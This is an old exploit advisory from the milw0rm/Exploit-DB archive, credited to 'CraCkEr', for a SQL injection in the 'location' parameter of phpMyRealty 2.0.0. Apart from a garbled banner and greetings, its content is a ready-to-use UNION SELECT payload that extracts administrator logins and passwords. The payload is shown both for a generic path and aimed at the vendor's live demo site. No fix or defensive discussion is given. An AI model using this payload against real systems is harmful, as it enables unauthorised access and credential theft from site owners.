phpMyRealty 2.0.0 - 'location' SQL Injection

EDB-ID:

6180


Author:

CraCkEr

Type:

webapps


Platform:

PHP

Date:

2008-08-01


????????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                 ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T              ??
???????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....       ?????
???????????????????????????????????????????????????????????????????????????????
??                           [ Remote SQL Injection ]                        ??
???????????????????????????????????????????????????????????????????????????????
: Author   : CraCkEr                   : :                                    :
? Group    : N/A                       ? ?                                    ?
? Script   : phpmyrealty               ? ?         Register Globals :         ?
? Download : phpmyrealty.com           ? ?                                    ?
? Critical : High [????????]           ? ?          [?] ON   [ ] OFF          ?
?                                      ? ?                                    ?
? ?????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                              ??
???????????????????????????????????????????????????????????????????????????????
:                                                                             :
?  Release Notes:                                                             ?
?  ?????????????                                                              ?
?  Typically used for remotely exploitable vulnerabilities that can lead to   ?
?  system compromise.                                                         ?
?                                                                             ?

???????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                 ??
???????????????????????????????????????????????????????????????????????????????

[SQL]

www.localhost/path/index.php?location=-1 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM pmr.pmr_2_admins--

Live Demo:

http://www.phpmyrealty.com/demo/index.php?location=-1 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM pmr.pmr_2_admins--



???????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .




???????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
???????????????????????????????????????????????????????????????????????????????


# milw0rm.com [2008-08-01]